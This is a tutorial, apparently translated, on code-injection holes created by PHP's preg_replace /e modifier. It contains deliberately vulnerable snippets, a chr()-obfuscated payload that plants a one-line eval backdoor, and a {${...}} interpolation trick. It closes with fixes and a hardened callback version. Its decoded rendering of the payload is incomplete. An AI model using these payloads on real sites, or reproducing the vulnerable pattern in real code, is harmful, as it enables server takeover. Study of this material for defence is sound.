


Use preg_replace's dangerous /e modifier with caution (commonly used for one-line backdoors)
preg_replace function prototype:
mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])
Special instructions:
The /e modifier causes preg_replace() to treat the replacement argument as PHP code (after the appropriate backreference substitution). Tip: make sure that replacement forms a valid PHP code string; otherwise PHP will report a parse error on the line containing preg_replace().
Example:
<?php
// The replacement string is evaluated as PHP for every match (/e).
preg_replace("/(<\/?)(\w+)([^>]*>)/e",
             "'\\1'.strtoupper('\\2').'\\3'",
             $html_body);
?>
This will make all HTML tags in the input string uppercase.
Security threat analysis:
Usually the subject parameter is generated by the client, and the client may construct malicious code. In the following example the request parameter is passed straight in as the replacement:
<?php
echo preg_replace("/test/e", $_GET["h"], "jutst test");
?>
If we submit ?h=phpinfo(), phpinfo() will be executed (with the /e modifier, preg_replace treats the replacement parameter as PHP code and executes it).
What happens if we submit the following code?
?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr( 112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).
chr(116).chr(97).chr(47) .chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39) .chr(41).chr(44).chr(39).chr(60).
chr(63).chr(112).chr(104).chr(112).chr(32).chr (101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr (84).chr(91).
chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39 ).chr(41).chr(59))
The plaintext corresponding to the encoded string is: fputs(fopen(data/a.php,w), );
The result is that a one-line backdoor file, a.php, is created in the /data/ directory.
Another, trickier example:
<?php
function test($str)
{
}
// /e evaluates the replacement as PHP; \1 is the text between [php] and [/php].
echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", 'test("\1")', $_GET["h"]);
?>
If we submit ?h=[php]phpinfo()[/php], will phpinfo() be executed?
Definitely not. After the regular expression matches, the replacement parameter becomes 'test("phpinfo()")', and phpinfo() is only a string argument at this point.
Is there any way to make it execute?
Of course. If we submit ?h=[php]{${phpinfo()}}[/php] here, phpinfo() will be executed. Why?
In PHP, if a double-quoted string contains a variable, the interpreter replaces it with the variable's value; variables in single quotes are not processed.
Note: a function call inside double quotes is not executed or substituted.
Here we need to construct a special variable through {${}}, giving 'test("{${phpinfo()}}")', so that the function is executed (${phpinfo()} is interpreted, which calls the function).
You can do the following test first:
echo "{${phpinfo()}}";
phpinfo will be executed successfully.
How to prevent this vulnerability?
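Change 'test("\1")' to "test('\\1')" (the backslash must be doubled inside a double-quoted PHP string) so that '${phpinfo()}' will be treated as an ordinary string (variables in single quotes will not be processed). With /e, PHP also escapes quotes in the text substituted for the backreference, so the input cannot close the single-quoted string.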
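Added example (not from the original article): /e was deprecated in PHP 5.5.0 and removed in PHP 7.0.0, so the durable fix is preg_replace_callback(), which hands the match to a function as data instead of evaluating it. The body of test() (HTML-escaping) and the name render_tags() are assumptions made for illustration.

```php
<?php
// Added example: hardened form of the [php]...[/php] handler above.
// test() is the page's placeholder function; its body here (HTML-escaping)
// is an assumption, since the page leaves it empty.
function test(string $str): string
{
    return htmlspecialchars($str, ENT_QUOTES, 'UTF-8');
}

// render_tags() is a hypothetical wrapper name, not from the page.
function render_tags(string $input): string
{
    // No /e: the callback receives the captured text as a plain string.
    // It is passed to test() as data and is never parsed as PHP source.
    $out = preg_replace_callback(
        '/\s*\[php\](.+?)\[\/php\]\s*/is',
        static function (array $m): string {
            return test($m[1]);
        },
        $input
    );
    // preg_replace_callback() returns null on a PCRE error; fail closed.
    if ($out === null) {
        throw new RuntimeException('regex error: ' . preg_last_error());
    }
    return $out;
}

// Constructed inputs: the two request values discussed on the page.
// Single-quoted literals, so PHP does no interpolation here either.
$samples = [
    '[php]phpinfo()[/php]',
    '[php]{${phpinfo()}}[/php]',
];
foreach ($samples as $h) {
    // Both come back as inert text; phpinfo() is never called.
    echo render_tags($h), PHP_EOL;
}
```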
